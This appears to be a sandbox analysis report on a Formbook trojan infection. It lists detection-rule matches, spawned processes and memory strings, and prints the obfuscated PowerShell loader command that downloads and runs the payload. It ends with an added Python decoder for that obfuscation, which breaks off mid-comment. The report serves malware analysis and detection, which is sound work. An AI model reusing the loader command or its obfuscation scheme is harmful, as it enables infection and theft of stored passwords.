Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21380535
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21440591
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21432446
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2142E4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21380770
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A4750
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21396962
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213829A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2144A9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21382840
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213668B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AE8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2143AB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21436BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21398DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21380C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21370CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A0F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213C2F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F4F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213FEFA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138CFE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21372FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21380E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2143EE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2143EEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21392E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2143CE93
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2144B16B10_2_2144B16B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136F17210_2_2136F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B516C10_2_213B516C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138B1B010_2_2138B1B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2142F0CC10_2_2142F0CC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143F0E010_2_2143F0E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214370E910_2_214370E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213870C010_2_213870C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143132D10_2_2143132D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136D34C10_2_2136D34C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213C739A10_2_213C739A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213852A010_2_213852A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214212ED10_2_214212ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139B2C010_2_2139B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143757110_2_21437571
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141D5B010_2_2141D5B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137146010_2_21371460
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143F43F10_2_2143F43F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143F7B010_2_2143F7B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214316CC10_2_214316CC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141591010_2_21415910
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138995010_2_21389950
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139B95010_2_2139B950
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ED80010_2_213ED800
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213838E010_2_213838E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143FB7610_2_2143FB76
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139FB8010_2_2139FB80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213BDBF910_2_213BDBF9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F5BF010_2_213F5BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21437A4610_2_21437A46
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143FA4910_2_2143FA49
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F3A6C10_2_213F3A6C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2142DAC610_2_2142DAC6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213C5AA010_2_213C5AA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141DAAC10_2_2141DAAC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21431D5A10_2_21431D5A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21437D7310_2_21437D73
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21383D4010_2_21383D40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139FDC010_2_2139FDC0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F9C3210_2_213F9C32
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143FCF210_2_2143FCF2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143FF0910_2_2143FF09
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21381F9210_2_21381F92
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143FFB110_2_2143FFB1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21389EB010_2_21389EB0
Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | Code function: 13_2_03C88BD6
Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | Code function: 13_2_03C7D80E
Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | Code function: 13_2_03C86E76
Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | Code function: 13_2_03C88DF6
Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | Code function: 13_2_03CA6516
Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | Code function: 13_2_03C8F536
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04482446
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043C1460
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448F43F
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0447E4F6
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043D0535
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04487571
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04490591
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0446D5B0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_044816CC
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043EC6E0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043D0770
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043F4750
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448F7B0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043CC7C0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0447F0CC
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_044870E9
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448F0E0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043D70C0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04458158
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0449B16B
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0440516C
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043C0100
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043BF172
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0446A118
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_044881CC
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043DB1B0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_044901AA
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04470274
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_044712ED
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043EB2C0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448A352
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448132D
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043BD34C
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_044903E6
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043DE3F0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0441739A
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043D0C00
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04449C32
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448FCF2
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043C0CF2
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04470CB5
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04481D5A
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04487D73
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043DAD00
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043D3D40
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043E8DBF
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043CADE0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043EFDC0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043D0E59
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448EE26
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043D9EB0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448EEDB
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043E2E90
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448CE93
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04444F40
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043F0F30
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448FF09
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04412F28
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043D1F92
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043DCFE0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04393FD2
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04393FD5
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043C2FC8
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448FFB1
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0443D800
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043DA840
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043D2840
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043B68B8
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043FE8F0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043D38E0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043E6962
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043D9950
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043EB950
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043D29A0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0449A9A6
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448FA49
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04487A46
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04443A6C
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0447DAC6
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043CEA80
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04415AA0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0446DAAC
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448AB40
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0448FB76
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04486BD7
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04445BF0
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0440DBF9
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_043EFB80
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0410C3C8
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0410AC08
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04109ECF
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0410B6E8
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0410B803
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0410B808
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0410BB9C
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 2136B970 appears 275 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 213C7E54 appears 100 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 213B5130 appears 57 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 213FF290 appears 103 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 213EEA12 appears 82 times
Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 043BB970 appears 268 times
Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04417E54 appears 91 times
Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04405130 appears 36 times
Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 0443EA12 appears 86 times
Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 0444F290 appears 105 times
Source: amsi32_7108.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4324, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.spyw.evad.winBAT@22/10@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Coumarate.Bic
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fatgl34k.okl.ps1
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rFV-452747284IN.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4324
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: clip.exe, 0000000E.00000002.3036314918.0000000007544000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034173382.0000000002863000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034173382.0000000002867000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rFV-452747284IN.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePan
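The command line above is the loader's own string decoder. `Antikvitetsforretnings` walks its argument with `Substring($i, $Cabalismsbryderens)` for `$i` = 4, 9, 14, ..., so one character in five is payload and the four before it are filler; `$Cabalismsbryderens` starts at 0 and is only bumped to 1 when `$host.CurrentCulture` is non-null, which means that in a host where that property is missing every decoded string is empty and the chain dies quietly. The Python below is an added example, not code from the report or from the sandbox: it reproduces that loop, pulls every `<helper> '<blob>'` call out of a command line and decodes it, and checks itself against literals copied from the command line above (`$Eksperter` decodes to `iex`, `$Torumslejligheds` to `User-Agent`, the first 60 characters of `$Antoninas` to `Mozilla/5.0`). The sample command line, the filler alphabet and the URL inside it are constructed. Caveat: the page's copy of the longer literals has dropped non-ASCII filler characters (compare `Landbrugsmssiges`), so their 5-byte alignment drifts after a few groups and only the all-ASCII literals decode cleanly from this rendering.

```python
"""Decoder for the every-fifth-character string obfuscation used by the PowerShell loader above.

Added example, not code from the report. Mirrors the helper's loop:
    For($i=4; $i -lt $s.Length-$w; $i+=5) { $out += $s.Substring($i, $w) }
where $w is 0 until `$host.CurrentCulture` is seen, then 1.
"""
import re

START = 4   # `$Cabalism=4`: index of the first payload character
STEP = 5    # `$Cabalism+=5`: one payload character per five
WIDTH = 1   # `$Cabalismsbryderens` after the CurrentCulture check (0 without it)


def deobfuscate(blob: str, start: int = START, step: int = STEP, width: int = WIDTH) -> str:
    """Reproduce the loader's Substring loop. With width=0 the result is always empty."""
    out = []
    i = start
    while i < len(blob) - width:
        out.append(blob[i:i + width])
        i += step
    return "".join(out)


def obfuscate(payload: str, filler: str = "abcd") -> str:
    """Inverse transform, used here only to build test data: four filler characters precede
    each payload character and one trailing filler keeps the last payload index below Length-1."""
    if len(filler) != STEP - WIDTH:
        raise ValueError("filler must be STEP - WIDTH characters long")
    return "".join(filler + ch for ch in payload) + filler[0]


def decode_literals(cmdline: str, helper: str) -> list[str]:
    """Decode the argument of every `<helper> '<blob>'` call found in a command line."""
    pattern = re.compile(re.escape(helper) + r"\s+'([^']*)'")
    return [deobfuscate(m.group(1)) for m in pattern.finditer(cmdline)]


# Literals copied exactly as printed in the command line above; these are pure ASCII and decode cleanly.
PAGE_LITERALS = {
    "$Eksperter": "GuttiVirke,trexScor ",
    "$Torumslejligheds": "BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ",
    "$Udarte": "Hytt>Sony ",
}
# First 60 characters of the $Antoninas literal as printed above. The page's copy of the rest has
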